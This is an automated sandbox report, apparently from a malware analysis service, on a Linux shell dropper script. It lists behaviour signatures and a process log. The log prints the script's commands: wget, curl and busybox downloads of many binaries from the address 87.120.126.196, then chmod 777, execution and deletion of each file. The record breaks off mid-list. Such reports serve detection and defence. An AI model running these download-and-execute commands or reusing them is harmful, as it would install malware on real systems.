Analysis Overview
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
Threat Level: Shows suspicious behavior
The file 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 01:28
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 01:28
Reported
2024-10-21 01:30
Platform
debian9-mipsbe-20240418-en
Max time kernel
87s
Max time network
92s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | N/A |
| N/A | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | N/A |
| N/A | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | N/A |
| N/A | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | N/A |
| N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | N/A |
| N/A | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | N/A |
| N/A | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | N/A |
| N/A | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | N/A |
| N/A | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | N/A |
| N/A | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | N/A |
| N/A | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | N/A |
| N/A | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | N/A |
| N/A | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | N/A |
| N/A | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | N/A |
| N/A | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | N/A |
| N/A | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | N/A |
| N/A | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | N/A |
| N/A | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | N/A |
| N/A | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | N/A |
| N/A | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | N/A |
| N/A | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | N/A |
| N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | N/A |
| N/A | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | N/A |
| N/A | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | N/A |
| N/A | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | N/A |
| N/A | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /usr/bin/curl | N/A |
Processes
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/chmod
[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/rm
[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/wget
[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/chmod
[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw
[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/rm
[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/wget
[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/chmod
[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ
[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/rm
[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/chmod
[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q
[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/rm
[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/wget
[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/chmod
[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/rm
[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/wget
[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/chmod
[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/rm
[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/wget
[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/chmod
[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/rm
[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/wget
[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/chmod
[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/rm
[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/wget
[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/chmod
[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/rm
[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/wget
[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/chmod
[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/rm
[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/wget
[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/chmod
[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/rm
[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/chmod
[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/rm
[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/wget
[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/chmod
[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/rm
[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/wget
[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/chmod
[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/rm
[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/wget
[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/chmod
[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/rm
[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/wget
[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/chmod
[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/rm
[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/wget
[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/chmod
[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/rm
[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/wget
[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/chmod
[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/rm
[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/wget
[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/chmod
[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/rm
[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/chmod
[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/rm
[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/wget
[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/chmod
[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/rm
[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/wget
[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/chmod
[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/rm
[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/wget
[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/chmod
[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/rm
[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/wget
